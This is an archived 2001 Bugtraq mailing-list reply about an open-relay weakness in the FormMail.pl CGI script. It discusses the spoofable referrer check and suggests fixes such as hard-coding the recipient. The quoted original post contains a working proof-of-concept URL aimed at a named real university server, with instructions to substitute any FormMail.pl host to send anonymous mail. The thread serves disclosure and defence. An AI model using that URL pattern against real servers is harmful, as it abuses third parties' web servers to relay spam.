[19593] in bugtraq
Re: CORRECTION to CODE: FormMail.pl can be used to send
daemon@ATHENA.MIT.EDU (Scott Buchanan)
Mon Mar 12 03:37:53 2001
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit
Message-ID: <3AAC4B4D.4A4DA0E8@axe.net.au>
Date: Mon, 12 Mar 2001 15:06:37 +1100
Reply-To: Scott Buchanan <scott@AXE.NET.AU>
From: Scott Buchanan <scott@AXE.NET.AU>
X-To: Michael Rawls <bugtraq@SHADOWSTORM.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Yeah, we actually had an incident of that long ago on our webservers, seems
a few people know about it. The problem is two-fold -
1) The FormMail program uses a referrer array as the ONLY security check
for calls to the program (which can be REALLY easily faked).
2) It allows the recipient email to be sent through as an HTML variable.
There's a few ways to get around this, the way we initially got around it
was to firewall the IP address of the spammer. The best(?) way is
(if/where possible) to hard-code the recipient address into the
installation.
From the example you sent, it doesn't look like the copy you've got is even
using the referrer security?
Michael Rawls wrote:
>
> Hi All,
> I did a little playing with FormMail.pl after a run in with a spammer
> abusing our webserver. Apparently ALL FormMail.pl cgi-bin scripts can be
> used to spam anonymously. I found another server with FormMail.pl and
> tried the same exploit to send myself an email and it worked.
>
> The email will not show the spammer's real IP. Only the web servers IP
> will show. The web server logs will however show the true IP address of
> the spammer.
>
> ===========
> Actual example of email sent;
> ============
> Return-Path: <apache@hum.auc.dk>
> Received: from hercules.humfak.auc.dk (hercules.humfak.auc.dk [130.225.58.9])
> by mail.dancris.com (8.9.3/8.9.3) with ESMTP id RAA14431
> for <spam-l@shadowstorm.com>; Sat, 10 Mar 2001 17:19:34 -0700
> Received: from apache by hercules.humfak.auc.dk with local (Exim 3.02 #8)
> id 14bta3-0004tP-00
> for spam-l@shadowstorm.com; Sun, 11 Mar 2001 01:19:27 +0100
> To: spam-l@shadowstorm.com
> From: ()
> Subject: WWW Form Submission
> Message-Id: <E14bta3-0004tP-00@hercules.humfak.auc.dk>
> Date: Sun, 11 Mar 2001 01:19:27 +0100
>
> Below is the result of your feedback form. It was submitted by
> () on Sunday, March 11, 2001 at 01:19:27
> ---------------------------------------------------------------------------
>
> message: Proof that FormMail.pl can be used to send anonymous spam.
>
> ---------------------------------------------------------------------------
>
> Paste the line below in to your web browser URL box as one long single
> line, insert your email in address in place of "email@address-to-spam.com",
> and press enter. Now go check your email.
>
> Begin URL code
> ================
> http://www.hum.auc.dk/cgi-bin/FormMail.pl?recipient=email@address-to-spam.co
> m&message=Proof%20that%20FormMail.pl%20can%20be%20used%20to%20send%20anonymo
> us%20spam.
> ================
>
> If this technique was not already in use by a spammer I would have kept it
> to myself, but it has already been on my server by a spammer.
>
> The address "www.hum.auc.dk" can be replaced with the address of ANY
> webserver set up to use FormMail.pl
>
> -M. Rawls
